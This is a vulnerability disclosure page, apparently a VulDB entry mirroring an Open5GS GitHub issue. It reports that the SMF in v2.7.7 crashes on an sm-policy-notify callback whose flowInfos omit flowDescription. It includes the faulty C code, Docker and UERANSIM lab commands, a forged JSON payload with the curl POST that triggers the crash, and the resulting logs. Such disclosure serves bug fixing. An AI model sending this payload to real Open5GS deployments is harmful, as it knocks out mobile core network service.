| tiêu đề | Open5gs SMF v2.7.7 Denial of Service |
|---|
| Mô tả | ### Open5GS Release, Revision, or Tag
v2.7.7
### Steps to reproduce
### Description
SMF crashes when an `sm-policy-notify` callback carries a `SmPolicyDecision`
whose `pccRules[*].flowInfos[*]` object omits `flowDescription`.
The OpenAPI parser allows `flowDescription` to be absent:
```c
flow_description = cJSON_GetObjectItemCaseSensitive(flow_informationJSON, "flowDescription");
...
flow_information_local_var = OpenAPI_flow_information_create(
flow_description && !cJSON_IsNull(flow_description)
? ogs_strdup(flow_description->valuestring) : NULL,
...
);
```
But the SMF callback handler unconditionally duplicates that pointer:
```c
flow->description = ogs_strdup(FlowInformation->flow_description);
ogs_assert(flow->description);
```
So a single callback with `flowDirection` but no `flowDescription` hits
`ogs_talloc_strdup` on `NULL`, then aborts the SMF process.
This path requires an existing SMF session, so the live reproduction below first
established a real UE PDU session using UERANSIM.
### Steps to reproduce
1. Start the Open5GS live Docker lab.
2. Bring up UERANSIM gNB and UE with the provided configs:
```bash
docker run -d --rm --name smf-audit-gnb \
--network open5gs --network-alias gnb.ueransim.org \
-v /home/ubuntu/docker-open5gs/configs/internal/ueransim/gnb.yaml:/ueransim/config/gnb.yaml:ro \
free5gc/ueransim:latest /ueransim/nr-gnb -c /ueransim/config/gnb.yaml
docker run -d --rm --name smf-audit-ue \
--network open5gs --network-alias ue.ueransim.org \
--cap-add NET_ADMIN --privileged \
-v /home/ubuntu/docker-open5gs/configs/internal/ueransim/ue.yaml:/ueransim/config/ue.yaml:ro \
free5gc/ueransim:latest /ueransim/nr-ue -c /ueransim/config/ue.yaml -r
```
3. Wait until the UE log shows:
```text
PDU Session establishment is successful PSI[1]
```
4. Send the forged callback to the active `smContextRef` (`1` in this live run):
```bash
payload=$(python3 - <<'PY'
import json
body={
"smPolicyDecision":{
"pccRules":{
"r1":{
"pccRuleId":"r1",
"refQosData":["q1"],
"precedence":1,
"flowInfos":[{"flowDirection":"UPLINK"}]
}
},
"qosDecs":{
"q1":{"qosId":"q1","5qi":1,"priorityLevel":1}
}
}
}
print(json.dumps(body, separators=(",", ":")))
PY
)
curl --http2-prior-knowledge -m 5 -sS -i \
-X POST http://10.33.33.13/nsmf-callback/v1/sm-policy-notify/1/update \
-H 'content-type: application/json' \
--data "$payload"
```
5. Check SMF state and logs:
```bash
docker inspect -f '{{.State.Status}} {{.State.ExitCode}} {{.State.FinishedAt}}' smf
docker logs --since 2026-04-10T19:02:30Z smf
```
### Logs
```shell
curl: (56) Recv failure: Connection reset by peer
exited 139 2026-04-10T19:02:42.968422154Z
04/10 19:02:42.852: [core] ERROR: ogs_talloc_strdup: Expectation `ptr' failed. (../lib/core/ogs-strings.c:157)
04/10 19:02:42.852: [smf] FATAL: update_authorized_pcc_rule_and_qos: Assertion `flow->description' failed. (../src/smf/npcf-handler.c:212)
```
### Expected behaviour
SMF should reject malformed `flowInfos` input with a normal HTTP error response.
### Observed Behaviour
The callback resets the connection and the SMF process exits with code `139`.
### eNodeB/gNodeB
UERANSIM gNB v3.2.7
### UE Models and versions
UERANSIM UE v3.2.7 |
|---|
| Nguồn | ⚠️ https://github.com/open5gs/open5gs/issues/4443 |
|---|
| Người dùng | LinZiyu (UID 94035) |
|---|
| Đệ trình | 20/04/2026 20:57 (cách đây 1 tháng) |
|---|
| Kiểm duyệt | 10/05/2026 16:40 (20 days later) |
|---|
| Trạng thái | được chấp nhận |
|---|
| Mục VulDB | 362546 [Open5GS đến 2.7.7 SMF /src/smf/npcf-handler.c update_authorized_pcc_rule_and_qos Từ chối dịch vụ] |
|---|
| điểm | 20 |
|---|